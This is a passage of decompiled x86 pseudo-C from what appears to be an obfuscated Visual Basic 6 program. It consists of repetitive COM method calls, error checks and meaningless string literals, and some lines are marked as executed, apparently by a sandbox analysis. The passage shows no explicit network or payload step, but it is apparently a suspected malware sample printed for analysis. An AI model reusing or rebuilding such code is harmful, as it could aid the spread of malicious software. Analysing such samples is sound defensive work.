				signed int _t1943;
				signed int _t1947;
				signed int _t1951;
				char* _t1952;
				char* _t1953;
				signed int _t1956;
				signed int _t1967;
				signed int _t1972;
				signed int* _t1976;
				signed int _t1979;
				signed int _t1981;
				signed int* _t1982;
				signed int _t1985;
				signed int _t1990;
				signed int _t1994;
				signed int _t1998;
				signed int _t2002;
				signed int _t2006;
				signed int _t2010;
				signed int _t2012;
				signed int _t2023;
				signed int _t2028;
				signed int _t2032;
				signed int _t2036;
				char* _t2076;
				intOrPtr _t2083;
				signed int* _t2090;
				signed int* _t2098;
				char* _t2112;
				char* _t2156;
				char* _t2158;
				intOrPtr _t2172;
				intOrPtr _t2187;
				void* _t2245;
				void* _t2247;
				intOrPtr _t2248;
				void* _t2250;
				long long* _t2251;
				void* _t2252;
				void* _t2253;
				void* _t2254;
				void* _t2255;
				void* _t2256;
				void* _t2264;
				void* _t2266;
				long long* _t2267;
				long long* _t2270;
				intOrPtr* _t2271;
				void* _t2272;
				signed int _t2306;
				signed int _t2321;
				signed int _t2389;
				long long _t2398;
				long long _t2401;
				signed int _t2402;
				signed int _t2403;
				signed long long _t2407;
				long long _t2409;
				long long _t2412;
				void* _t2418;

				_t2248 = _t2247 - 0x10;
				 *[fs:0x0] = _t2248;
				L00401310();
				_v20 = _t2248;
				_v16 = 0x401270;
				_v12 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t2245);
				_push(5);
				_push(0x40404c);
				_push( &_v80);
				L004014BA();
				_push(5);
				_push(0x40404c);
				_push( &_v152);
				L004014BA();
				_push(0x45f8);
				_t1424 =  &_v288;
				_push(_t1424);
				L004014AE();
				_push(_t1424);
				L004014B4();
				_v412 =  ~(0 | _t1424 != 0x0000ffff);
				L0040152C();
				if(_v412 != 0) {
					if( *0x417360 != 0) {
						_v508 = 0x417360;
					} else {
						_push(0x417360);
						_push(0x403c34);
						L0040156E();
						_v508 = 0x417360;
					}
					_t21 =  &_v508; // 0x417360
					_v420 =  *((intOrPtr*)( *_t21));
					_t2023 =  *((intOrPtr*)( *_v420 + 0x1c))(_v420,  &_v212);
					asm("fclex");
					_v424 = _t2023;
					if(_v424 >= 0) {
						_v512 = _v512 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403c24);
						_push(_v420);
						_push(_v424);
						L00401574();
						_v512 = _t2023;
					}
					_v428 = _v212;
					_v280 = 0x80020004;
					_v288 = 0xa;
					if( *0x417010 != 0) {
						_v516 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v516 = 0x417010;
					}
					_t2028 =  &_v208;
					L004014A8();
					_v412 = _t2028;
					_t2032 =  *((intOrPtr*)( *_v412 + 0x48))(_v412,  &_v200, _t2028,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x314))( *_v516));
					asm("fclex");
					_v416 = _t2032;
					if(_v416 >= 0) {
						_v520 = _v520 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403cdc);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v520 = _t2032;
					}
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t2036 =  *((intOrPtr*)( *_v428 + 0x60))(_v428, _v200, 0x10);
					asm("fclex");
					_v432 = _t2036;
					if(_v432 >= 0) {
						_v524 = _v524 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403cec);
						_push(_v428);
						_push(_v432);
						L00401574();
						_v524 = _t2036;
					}
					L00401532();
					_push( &_v212);
					_push( &_v208);
					_push(2);
					L004014A2();
					_t2248 = _t2248 + 0xc;
				}
				if( *0x417010 != 0) {
					_v528 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v528 = 0x417010;
				}
				_t1429 =  &_v208;
				L004014A8();
				_v412 = _t1429;
				_v280 = 0x80020004;
				_v288 = 0xa;
				L00401310();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1433 =  *((intOrPtr*)( *_v412 + 0x1b0))(_v412, 0x10, _t1429,  *((intOrPtr*)( *((intOrPtr*)( *_v528)) + 0x310))( *_v528));
				asm("fclex");
				_v416 = _t1433;
				if(_v416 >= 0) {
					_v532 = _v532 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x403cdc);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v532 = _t1433;
				}
				L00401562();
				_push(0);
				L0040155C();
				if( *0x417010 != 0) {
					_v536 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v536 = 0x417010;
				}
				_t1437 =  &_v208;
				L004014A8();
				_v412 = _t1437;
				_t1441 =  *((intOrPtr*)( *_v412 + 0xe0))(_v412,  &_v356, _t1437,  *((intOrPtr*)( *((intOrPtr*)( *_v536)) + 0x300))( *_v536));
				asm("fclex");
				_v416 = _t1441;
				if(_v416 >= 0) {
					_v540 = _v540 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x403cfc);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v540 = _t1441;
				}
				if( *0x417010 != 0) {
					_v544 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v544 = 0x417010;
				}
				_t1445 =  &_v212;
				L004014A8();
				_v420 = _t1445;
				_t1449 =  *((intOrPtr*)( *_v420 + 0x78))(_v420,  &_v376, _t1445,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x304))( *_v544));
				asm("fclex");
				_v424 = _t1449;
				if(_v424 >= 0) {
					_v548 = _v548 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403cfc);
					_push(_v420);
					_push(_v424);
					L00401574();
					_v548 = _t1449;
				}
				if( *0x417010 != 0) {
					_v552 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v552 = 0x417010;
				}
				_t1453 =  &_v216;
				L004014A8();
				_v428 = _t1453;
				_t1457 =  *((intOrPtr*)( *_v428 + 0x108))(_v428,  &_v200, _t1453,  *((intOrPtr*)( *((intOrPtr*)( *_v552)) + 0x308))( *_v552));
				asm("fclex");
				_v432 = _t1457;
				if(_v432 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x403cdc);
					_push(_v428);
					_push(_v432);
					L00401574();
					_v556 = _t1457;
				}
				if( *0x417010 != 0) {
					_v560 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v560 = 0x417010;
				}
				_t1461 =  &_v220;
				L004014A8();
				_v436 = _t1461;
				_t1465 =  *((intOrPtr*)( *_v436 + 0x48))(_v436,  &_v204, _t1461,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x2fc))( *_v560));
				asm("fclex");
				_v440 = _t1465;
				if(_v440 >= 0) {
					_v564 = _v564 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x403cfc);
					_push(_v436);
					_push(_v440);
					L00401574();
					_v564 = _t1465;
				}
				if( *0x417010 != 0) {
					_v568 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v568 = 0x417010;
				}
				_t1469 =  &_v224;
				L004014A8();
				_v444 = _t1469;
				_t1473 =  *((intOrPtr*)( *_v444 + 0x88))(_v444,  &_v380, _t1469,  *((intOrPtr*)( *((intOrPtr*)( *_v568)) + 0x2fc))( *_v568));
				asm("fclex");
				_v448 = _t1473;
				if(_v448 >= 0) {
					_v572 = _v572 & 0x00000000;
				} else {
					_push(0x88);
					_push(0x403cfc);
					_push(_v444);
					_push(_v448);
					L00401574();
					_v572 = _t1473;
				}
				_v396 = _v380;
				_v360 = 0x3b4f;
				_v392 =  *0x401268;
				_t2398 = _v376;
				_v388 = _t2398;
				_v384 = 0x13b4a8;
				_t1482 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v384, _v356, 0xe4cea490, 0x5b02,  &_v388, _v200,  &_v392, _v204,  &_v360, 0xaa6,  &_v396,  &_v400);
				_v452 = _t1482;
				if(_v452 >= 0) {
					_v576 = _v576 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x403414);
					_push(_a4);
					_push(_v452);
					L00401574();
					_v576 = _t1482;
				}
				_v172 = _v400;
				_push( &_v204);
				_push( &_v200);
				_push(2);
				L00401550();
				_push( &_v224);
				_push( &_v220);
				_push( &_v216);
				_push( &_v212);
				_push( &_v208);
				_push(5);
				L004014A2();
				_t2250 = _t2248 + 0x24;
				_v232 = 9;
				_v240 = 2;
				_t1491 =  &_v240;
				_push(_t1491);
				L0040149C();
				L00401544();
				_push(_t1491);
				_push(0x403d10);
				L0040154A();
				asm("sbb eax, eax");
				_v412 =  ~( ~( ~_t1491));
				L00401532();
				L0040152C();
				if(_v412 != 0) {
					if( *0x417010 != 0) {
						_v580 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v580 = 0x417010;
					}
					_t1990 =  &_v208;
					L004014A8();
					_v428 = _t1990;
					_t1994 =  *((intOrPtr*)( *_v428 + 0x60))(_v428,  &_v376, _t1990,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x304))( *_v580));
					asm("fclex");
					_v432 = _t1994;
					if(_v432 >= 0) {
						_v584 = _v584 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403cfc);
						_push(_v428);
						_push(_v432);
						L00401574();
						_v584 = _t1994;
					}
					if( *0x417010 != 0) {
						_v588 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v588 = 0x417010;
					}
					_t1998 =  &_v212;
					L004014A8();
					_v420 = _t1998;
					_t2002 =  *((intOrPtr*)( *_v420 + 0x48))(_v420,  &_v200, _t1998,  *((intOrPtr*)( *((intOrPtr*)( *_v588)) + 0x304))( *_v588));
					asm("fclex");
					_v424 = _t2002;
					if(_v424 >= 0) {
						_v592 = _v592 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403cfc);
						_push(_v420);
						_push(_v424);
						L00401574();
						_v592 = _t2002;
					}
					if( *0x417010 != 0) {
						_v596 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v596 = 0x417010;
					}
					_t2006 =  &_v216;
					L004014A8();
					_v412 = _t2006;
					_t2010 =  *((intOrPtr*)( *_v412 + 0x170))(_v412,  &_v204, _t2006,  *((intOrPtr*)( *((intOrPtr*)( *_v596)) + 0x2fc))( *_v596));
					asm("fclex");
					_v416 = _t2010;
					if(_v416 >= 0) {
						_v600 = _v600 & 0x00000000;
					} else {
						_push(0x170);
						_push(0x403cfc);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v600 = _t2010;
					}
					_t2012 =  ~_v376;
					_push(_t2012);
					_push(_v200);
					_push(_v204);
					_push(0);
					L00401496();
					_v184 = _t2012;
					_push( &_v200);
					_push( &_v204);
					_push(2);
					L00401550();
					_push( &_v216);
					_push( &_v212);
					_push( &_v208);
					_push(3);
					L004014A2();
					_t2250 = _t2250 + 0x1c;
				}
				L00401490();
				_v188 = _t2398;
				if( *0x417010 != 0) {
					_v604 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v604 = 0x417010;
				}
				_t1499 =  &_v208;
				L004014A8();
				_v412 = _t1499;
				_t1502 =  *((intOrPtr*)( *_v412 + 0x1c4))(_v412, _t1499,  *((intOrPtr*)( *((intOrPtr*)( *_v604)) + 0x304))( *_v604));
				asm("fclex");
				_v416 = _t1502;
				if(_v416 >= 0) {
					_v608 = _v608 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x403cfc);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v608 = _t1502;
				}
				L00401562();
				if( *0x417010 != 0) {
					_v612 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v612 = 0x417010;
				}
				_t1506 =  &_v208;
				L004014A8();
				_v412 = _t1506;
				_t1510 =  *((intOrPtr*)( *_v412 + 0x48))(_v412,  &_v200, _t1506,  *((intOrPtr*)( *((intOrPtr*)( *_v612)) + 0x308))( *_v612));
				asm("fclex");
				_v416 = _t1510;
				if(_v416 >= 0) {
					_v616 = _v616 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x403cdc);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v616 = _t1510;
				}
				_v476 = _v200;
				_v200 = _v200 & 0x00000000;
				L00401544();
				_t1516 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v204, 0x5c07,  &_v356);
				_v420 = _t1516;
				if(_v420 >= 0) {
					_v620 = _v620 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x403414);
					_push(_a4);
					_push(_v420);
					L00401574();
					_v620 = _t1516;
				}
				_v96 = _v356;
				L00401532();
				L00401562();
				_v280 = L"9-9-9";
				_v288 = 8;
				_t2076 =  &_v240;
				L0040151A();
				_push( &_v240);
				_push( &_v256);
				L00401484();
				_v296 = 9;
				_v304 = 0x8002;
				_push( &_v256);
				_t1521 =  &_v304;
				_push(_t1521);
				L0040148A();
				_v412 = _t1521;
				_push( &_v256);
				_push( &_v240);
				_push(2);
				L00401514();
				_t2251 = _t2250 + 0xc;
				_t2306 = _v412;
				if(_t2306 != 0) {
					_v280 = L"Skattekistens2";
					_v288 = 8;
					L0040151A();
					_push(2);
					_push( &_v240);
					L00401526();
					_v92 = _t2398;
					_t2076 =  &_v240;
					L0040152C();
				}
				 *_v68 =  *0x401260;
				 *((long long*)(_v68 + 8)) =  *0x401258;
				_v376 =  &_v80;
				_t2401 =  *0x401250;
				_push(_t2076);
				_push(_t2076);
				 *_t2251 = _t2401;
				asm("fld1");
				_push(_t2076);
				_push(_t2076);
				 *_t2251 = _t2401;
				_push( &_v376);
				L00401478();
				L0040147E();
				asm("fcomp qword [0x401248]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t2306 != 0) {
					if( *0x417360 != 0) {
						_v624 = 0x417360;
					} else {
						_push(0x417360);
						_push(0x403c34);
						L0040156E();
						_v624 = 0x417360;
					}
					_t376 =  &_v624; // 0x417360
					_t1981 =  *((intOrPtr*)( *_t376));
					_v412 = _t1981;
					L00401472();
					_t1982 =  &_v208;
					L004014A8();
					_t1985 =  *((intOrPtr*)( *_v412 + 0x40))(_v412, _t1982, _t1982, _t1981, _v116, 0x403d68, L"VINKLDEREN");
					asm("fclex");
					_v416 = _t1985;
					if(_v416 >= 0) {
						_v628 = _v628 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x403c24);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v628 = _t1985;
					}
					L00401562();
				}
				_v280 = 0x403d7c;
				_v288 = 8;
				L0040151A();
				_push(0);
				_push(3);
				_push( &_v240);
				_push( &_v256);
				L0040146C();
				_v296 = 0x403d84;
				_v304 = 0x8008;
				_push( &_v256);
				_t1532 =  &_v304;
				_push(_t1532);
				L0040148A();
				_v412 = _t1532;
				_push( &_v256);
				_push( &_v240);
				_push(2);
				L00401514();
				_t2252 = _t2251 + 0xc;
				if(_v412 != 0) {
					if( *0x417360 != 0) {
						_v632 = 0x417360;
					} else {
						_push(0x417360);
						_push(0x403c34);
						L0040156E();
						_v632 = 0x417360;
					}
					_t407 =  &_v632; // 0x417360
					_v412 =  *((intOrPtr*)( *_t407));
					_t1976 =  &_v208;
					L00401568();
					_t1979 =  *((intOrPtr*)( *_v412 + 0x10))(_v412, _t1976, _t1976, _a4);
					asm("fclex");
					_v416 = _t1979;
					if(_v416 >= 0) {
						_v636 = _v636 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x403c24);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v636 = _t1979;
					}
					L00401562();
				}
				if( *0x417010 != 0) {
					_v640 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v640 = 0x417010;
				}
				_t1539 =  &_v208;
				L004014A8();
				_v412 = _t1539;
				_t1543 =  *((intOrPtr*)( *_v412 + 0xd8))(_v412,  &_v356, _t1539,  *((intOrPtr*)( *((intOrPtr*)( *_v640)) + 0x314))( *_v640));
				asm("fclex");
				_v416 = _t1543;
				if(_v416 >= 0) {
					_v644 = _v644 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x403cdc);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v644 = _t1543;
				}
				if( *0x417010 != 0) {
					_v648 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v648 = 0x417010;
				}
				_t2083 =  *((intOrPtr*)( *_v648));
				_t1547 =  &_v212;
				L004014A8();
				_v420 = _t1547;
				_t1551 =  *((intOrPtr*)( *_v420 + 0x68))(_v420,  &_v376, _t1547,  *((intOrPtr*)(_t2083 + 0x310))( *_v648));
				asm("fclex");
				_v424 = _t1551;
				if(_v424 >= 0) {
					_v652 = _v652 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x403cdc);
					_push(_v420);
					_push(_v424);
					L00401574();
					_v652 = _t1551;
				}
				_v364 = 0x3fba;
				_v360 = _v356;
				_t2402 =  *0x401240;
				_v428 = _t2402;
				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v360, 0x5f6d41, _v376, _t2083, _t2083,  &_v364);
				_push( &_v212);
				_push( &_v208);
				_push(2);
				L004014A2();
				_t2253 = _t2252 + 0xc;
				_v280 = L"8/8/8";
				_v288 = 8;
				L0040151A();
				_t1560 =  &_v240;
				_push(_t1560);
				L00401466();
				_v412 =  ~(0 | _t1560 != 0x0000ffff);
				L0040152C();
				if(_v412 != 0) {
					if( *0x417360 != 0) {
						_v656 = 0x417360;
					} else {
						_push(0x417360);
						_push(0x403c34);
						L0040156E();
						_v656 = 0x417360;
					}
					_t481 =  &_v656; // 0x417360
					_v412 =  *((intOrPtr*)( *_t481));
					_t1967 =  *((intOrPtr*)( *_v412 + 0x1c))(_v412,  &_v208);
					asm("fclex");
					_v416 = _t1967;
					if(_v416 >= 0) {
						_v660 = _v660 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403c24);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v660 = _t1967;
					}
					_v420 = _v208;
					_t1972 =  *((intOrPtr*)( *_v420 + 0x64))(_v420, 1,  &_v356);
					asm("fclex");
					_v424 = _t1972;
					if(_v424 >= 0) {
						_v664 = _v664 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x403cec);
						_push(_v420);
						_push(_v424);
						L00401574();
						_v664 = _t1972;
					}
					_v196 = _v356;
					L00401562();
				}
				_v280 = 0x80020004;
				_v288 = 0xa;
				_t1562 = 0x10;
				L00401310();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Magniumets");
				_push(L"ludderens");
				_push(L"AFFIXING"); // executed
				L00401460(); // executed
				L00401544();
				_push(_t1562);
				_push(0);
				L0040154A();
				asm("sbb eax, eax");
				_v412 =  ~( ~( ~_t1562));
				_t2090 =  &_v200;
				L00401532();
				_t2321 = _v412;
				if(_t2321 != 0) {
					_v280 = L"Trvegraven";
					_v288 = 8;
					_v312 = 0x3ac15e;
					_v320 = 3;
					_push(0x10);
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"aCr7BNH7p7FLa196");
					_push(_v192);
					L0040145A();
					_t2253 = _t2253 + 0x2c;
				}
				_v248 = 0x80020004;
				_v256 = 0xa;
				_v232 = 0x80020004;
				_v240 = 0xa;
				_push( &_v256);
				_push( &_v240);
				asm("fld1");
				_push(_t2090);
				_push(_t2090);
				_v484 = _t2402;
				asm("fld1");
				_push(_t2090);
				_push(_t2090);
				_v492 = _t2402;
				asm("fld1");
				_push(_t2090);
				_push(_t2090);
				_v500 = _t2402;
				L00401454();
				L0040147E();
				asm("fcomp qword [0x401238]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t2321 == 0) {
					_v668 = _v668 & 0x00000000;
				} else {
					_v668 = 1;
				}
				_v412 =  ~_v668;
				_push( &_v256);
				_push( &_v240);
				_push(2);
				L00401514();
				_t2254 = _t2253 + 0xc;
				if(_v412 != 0) {
					if( *0x417010 != 0) {
						_v672 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v672 = 0x417010;
					}
					_t1939 =  &_v208;
					L004014A8();
					_v412 = _t1939;
					_t1943 =  *((intOrPtr*)( *_v412 + 0x138))(_v412,  &_v376, _t1939,  *((intOrPtr*)( *((intOrPtr*)( *_v672)) + 0x310))( *_v672));
					asm("fclex");
					_v416 = _t1943;
					if(_v416 >= 0) {
						_v676 = _v676 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x403cdc);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v676 = _t1943;
					}
					if( *0x417010 != 0) {
						_v680 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v680 = 0x417010;
					}
					_t2187 =  *((intOrPtr*)( *_v680));
					_t1947 =  &_v212;
					L004014A8();
					_v420 = _t1947;
					_t1951 =  *((intOrPtr*)( *_v420 + 0x178))(_v420,  &_v216, _t1947,  *((intOrPtr*)(_t2187 + 0x300))( *_v680));
					asm("fclex");
					_v424 = _t1951;
					if(_v424 >= 0) {
						_v684 = _v684 & 0x00000000;
					} else {
						_push(0x178);
						_push(0x403cfc);
						_push(_v420);
						_push(_v424);
						L00401574();
						_v684 = _t1951;
					}
					_t1952 =  &_v240;
					L0040144E();
					_t2272 = _t2254 + 0x10;
					L00401448();
					_t1953 =  &_v240;
					L00401442();
					_v688 = _t1953;
					asm("fild dword [ebp-0x2ac]");
					_v692 =  *0x401230;
					_v552 = _v692;
					_t2418 =  *0x40122c;
					_v556 = _t2418;
					asm("fild dword [ebp-0x174]");
					_v696 = _t2418;
					_v560 = _v696;
					_v564 =  *0x401228;
					_t1956 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t2187, _t2187, _t2187, _t2187, _t1953, _t1952, _t1952, _v216, 0, 0);
					asm("fclex");
					_v428 = _t1956;
					if(_v428 >= 0) {
						_v700 = _v700 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x4033e4);
						_push(_a4);
						_push(_v428);
						L00401574();
						_v700 = _t1956;
					}
					_push( &_v216);
					_push( &_v212);
					_push( &_v208);
					_push(3);
					L004014A2();
					_t2254 = _t2272 + 0x10;
					L0040152C();
				}
				if( *0x417010 != 0) {
					_v704 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v704 = 0x417010;
				}
				_t1577 =  &_v208;
				L004014A8();
				_v412 = _t1577;
				_t1581 =  *((intOrPtr*)( *_v412 + 0x130))(_v412,  &_v200, _t1577,  *((intOrPtr*)( *((intOrPtr*)( *_v704)) + 0x318))( *_v704));
				asm("fclex");
				_v416 = _t1581;
				if(_v416 >= 0) {
					_v708 = _v708 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403e24);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v708 = _t1581;
				}
				_v408 = 0xe6a27e60;
				_v404 = 0x5afb;
				_v480 = _v200;
				_v200 = _v200 & 0x00000000;
				L00401544();
				 *((intOrPtr*)( *_a4 + 0x718))(_a4, 0x3539,  &_v204, L"toddlekins",  &_v408);
				L00401532();
				L00401562();
				if( *0x417360 != 0) {
					_v712 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v712 = 0x417360;
				}
				_t631 =  &_v712; // 0x417360
				_v412 =  *((intOrPtr*)( *_t631));
				_t1593 =  *((intOrPtr*)( *_v412 + 0x14))(_v412,  &_v208);
				asm("fclex");
				_v416 = _t1593;
				if(_v416 >= 0) {
					_v716 = _v716 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403c24);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v716 = _t1593;
				}
				_v420 = _v208;
				_t1598 =  *((intOrPtr*)( *_v420 + 0xf8))(_v420,  &_v200);
				asm("fclex");
				_v424 = _t1598;
				if(_v424 >= 0) {
					_v720 = _v720 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403e50);
					_push(_v420);
					_push(_v424);
					L00401574();
					_v720 = _t1598;
				}
				_v484 = _v200;
				_v200 = _v200 & 0x00000000;
				L00401544();
				_t2098 =  &_v208;
				L00401562();
				_v264 = 0x80020004;
				_v272 = 0xa;
				_v248 = 0x80020004;
				_v256 = 0xa;
				_v232 = 0x80020004;
				_v240 = 0xa;
				_push( &_v272);
				_push( &_v256);
				_push( &_v240);
				_t2403 =  *0x401220;
				_push(_t2098);
				_push(_t2098);
				_v576 = _t2403;
				asm("fld1");
				_push(_t2098);
				_push(_t2098);
				_v584 = _t2403;
				asm("fld1");
				_push(_t2098);
				_push(_t2098);
				_v592 = _t2403;
				L0040143C();
				_v128 = _t2403;
				_push( &_v272);
				_push( &_v256);
				_push( &_v240);
				_push(3);
				L00401514();
				_t2255 = _t2254 + 0x10;
				_v232 = 0x172e;
				_v240 = 2;
				_t1606 =  &_v240;
				_push(_t1606);
				L00401436();
				asm("sbb eax, eax");
				_v412 =  ~( ~( ~_t1606));
				L0040152C();
				_t1610 = _v412;
				if(_t1610 != 0) {
					_push(0x19);
					L00401430();
					_v48 = _t1610;
				}
				if( *0x417010 != 0) {
					_v724 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v724 = 0x417010;
				}
				_t1614 =  &_v208;
				L004014A8();
				_v412 = _t1614;
				_t1618 =  *((intOrPtr*)( *_v412 + 0x118))(_v412,  &_v376, _t1614,  *((intOrPtr*)( *((intOrPtr*)( *_v724)) + 0x30c))( *_v724));
				asm("fclex");
				_v416 = _t1618;
				if(_v416 >= 0) {
					_v728 = _v728 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403cdc);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v728 = _t1618;
				}
				if( *0x417010 != 0) {
					_v732 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v732 = 0x417010;
				}
				_t1622 =  &_v212;
				L004014A8();
				_v420 = _t1622;
				_t1626 =  *((intOrPtr*)( *_v420 + 0x78))(_v420,  &_v380, _t1622,  *((intOrPtr*)( *((intOrPtr*)( *_v732)) + 0x300))( *_v732));
				asm("fclex");
				_v424 = _t1626;
				if(_v424 >= 0) {
					_v736 = _v736 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403cfc);
					_push(_v420);
					_push(_v424);
					L00401574();
					_v736 = _t1626;
				}
				if( *0x417010 != 0) {
					_v740 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v740 = 0x417010;
				}
				_t1630 =  &_v216;
				L004014A8();
				_v428 = _t1630;
				_t1634 =  *((intOrPtr*)( *_v428 + 0x180))(_v428,  &_v356, _t1630,  *((intOrPtr*)( *((intOrPtr*)( *_v740)) + 0x30c))( *_v740));
				asm("fclex");
				_v432 = _t1634;
				if(_v432 >= 0) {
					_v744 = _v744 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x403cdc);
					_push(_v428);
					_push(_v432);
					L00401574();
					_v744 = _t1634;
				}
				if( *0x417010 != 0) {
					_v748 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v748 = 0x417010;
				}
				_t1638 =  &_v220;
				L004014A8();
				_v436 = _t1638;
				_t1642 =  *((intOrPtr*)( *_v436 + 0x1e0))(_v436,  &_v200, _t1638,  *((intOrPtr*)( *((intOrPtr*)( *_v748)) + 0x304))( *_v748));
				asm("fclex");
				_v440 = _t1642;
				if(_v440 >= 0) {
					_v752 = _v752 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x403cfc);
					_push(_v436);
					_push(_v440);
					L00401574();
					_v752 = _t1642;
				}
				_v488 = _v200;
				_v200 = _v200 & 0x00000000;
				_t2112 =  &_v204;
				L00401544();
				_v408 = 0xbe56f550;
				_v404 = 0x5af4;
				_v384 = _v376;
				_v360 = 0x3037;
				_v700 = _v380;
				_v712 =  *0x401218;
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4, 0x53b696d0, 0x5b01,  &_v360, _t2112, _t2112,  &_v384, _t2112,  &_v408, _v356,  &_v204, 0x3dd855,  &_v388);
				_v100 = _v388;
				L00401532();
				_push( &_v220);
				_push( &_v216);
				_push( &_v212);
				_t1657 =  &_v208;
				_push(_t1657);
				_push(4);
				L004014A2();
				_t2256 = _t2255 + 0x14;
				_push(1);
				L0040142A();
				if(_t1657 != 0x800000) {
					_t1934 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x1962);
					asm("fclex");
					_v412 = _t1934;
					if(_v412 >= 0) {
						_v756 = _v756 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x4033e4);
						_push(_a4);
						_push(_v412);
						L00401574();
						_v756 = _t1934;
					}
				}
				_t1660 =  *((intOrPtr*)( *_a4 + 0x114))(_a4, 1);
				asm("fclex");
				_v412 = _t1660;
				if(_v412 >= 0) {
					_v760 = _v760 & 0x00000000;
				} else {
					_push(0x114);
					_push(0x4033e4);
					_push(_a4);
					_push(_v412);
					L00401574();
					_v760 = _t1660;
				}
				_t1664 =  *((intOrPtr*)( *_a4 + 0x110))(_a4,  &_v356);
				asm("fclex");
				_v412 = _t1664;
				if(_v412 >= 0) {
					_v764 = _v764 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x4033e4);
					_push(_a4);
					_push(_v412);
					L00401574();
					_v764 = _t1664;
				}
				_t1665 = _v356;
				if(_t1665 == _v40) {
					_push(0x6d);
					L00401424();
